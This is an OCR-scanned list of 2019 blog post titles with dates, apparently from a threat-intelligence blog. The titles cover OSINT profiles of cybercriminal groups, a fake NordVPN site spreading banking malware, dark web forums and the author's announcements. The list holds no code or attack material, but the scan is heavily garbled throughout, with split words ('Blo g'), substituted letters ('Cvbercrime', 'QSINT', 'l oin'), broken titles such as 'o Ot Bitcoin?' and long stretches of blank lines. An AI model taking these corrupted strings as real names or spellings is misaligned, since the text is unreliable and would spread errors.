■ Proprietary Cvbercrime and Dark Web Forum 
Search En g ine - BETA Access Available! (2019- 
05-28 20:48 ) 

■ Dancho Danchev's Blo g - Public Comments Now 
O pen! ( 2019-05-29 08:38 ) 

■ Dancho Danchev's Blo g - Audio Version 
Available - Listen to Every Post! (2019-05-30 
16:15 ) 

■ U pcomin g Security Pro j ect - Acceptin g 
Donations and Feedback! ( 2019-05-30 17:11 ) 

uly. 

■ U pcomin g Offensive Warfare 2.0 Cvber Securit y 
and Hackin g Community YouTube Livestream 
Broadcast-RSVP Toda y! ( 2019-07-02 11:17 ) 

■ Exposin g Bul g aria's Lar g est Data Leak - An 
OSINT Analysis ( 2019-07-27 10:46 ) 





















































































■ Who's Behind the Syrian Electronic Army? - An 
OS1NT Analysis ( 2019-07-28 18:19 ) 

■ Profilin g a Currently Active Portfolio of Hi gh- 
Profile Cvbercriminal l abber and XMPP Accounts 
( 2019-07-29 17:05 ) 

■ Exposin g Evg eniy Mikhaylovich Bo g achev and 
the " I abber ZeuS 11 Gan g - An QSINT Analysis 
( 2019-07-29 17:18 ) 

■ Profilin g "Innovative Marketin g " - The Fla g shi p 
Malvertisin g andf Scareware Distributor - Circa 
2008 - An QSINT Analysis ( 2019-07-30 14:50 ) 

August 

■ Assessin g the Recently Leaked FSB Contractor 
Data - A Peek Inside Russia's Understandin g of 

Social Network Analysis and Tailored Access 
O perations ( 2019-08-02 15:20 ) 

■ g Qt Bitcoin? ( 2019-08-19 12:51 1 
September 

■ DDanchev is for Hire! (2019-09-07 14:38 ) 

■ Historical QSINT -The Russian Business Network 

Sa vs "Hi" ( 2019-09-09 15:27 ) 

■ l oin Me on Patreon Communit y! ( 2019-09-09 
18:07 ) 

■ Fake NordVPN Web Site Drops Bankin g Malware 
S potted in the Wild ( 2019-09-11 16:53 ) 

■ Historical QSINT - Geor g ian l ustice Department 
and Geor g ia Ministry of Defense Com promised 
Servin g Malware Courtesy of the Kneber Botnet 
( 2019-09-11 19:07 ) 

■ I'm Back! (2019-09-17 09:56 ) 

■ Massive Portfolio of APT ( Advanced Persistent 
Threat ) and RAT ( Remote Access Tools ) Domains 
S potted in the Wild - An Analysis (2019-09-20 
17:17 ) 

■ Historical QSINT - Dancho Danchev's Media and 

News Covera g e - 2008-2013 ( 2019-09-20 17:25 ) 























































































October 

■ Announcin g Law Enforcement and OSINT 
Intelli g ence Operation "Uncle Geor g e" - l oin Me 
Toda y! ( 2019-10-16 20:16 ) 

November 

■ New Commercial Security Research OSINT 
C vbercrime Research and Threat Intelli ia ence 
Gatherin g Services Portfolio Available On 
Demand! ( 2019-11-02 18:14 ) 

December 

■ New Cvbertronics - VR for Hackers and Securit y 
Experts Dark Web Onion Address ( 2019-12-02 
10:15 ) 

■ Official World Hacker Global Domination Grou p 

( WHGDG ) Dark Web Onion Launch! ( 2019-12-02 
10:16 ) 

■ Dancho Danchev's Twitter Account - 2010 - 
Direct Download Link - Historical OSINT ( 2019- 
12-02 10:19 ) 

■ l oin me on Medium! (2019-12-02 10:59 ) 

■ o Ot Bitcoin? - Part Two (2019-12-04 18:15 ) 

■ Announcin g New Hackin g Security and 
Hacktivism-Themed Online Forum Communit y! 

l oin me Toda y! ( 2019-12-12 19:00 ) 

■ Announcin g Law Enforcement and OSINT 
Intelli g ence Operation "Uncle Geor g e" - l oin Me 
Today! - Part Two ( 2019-12-12 19:12 ) 

■ Happ y Holida ys! ( 2019-12-23 20:08 ) 

■ Exposin g Hi g h Tech Brazil Hack Team Mass Web 
Site Defacement Group - An OSINT Analysis 
( 2019-12-27 15:38 ) 


































































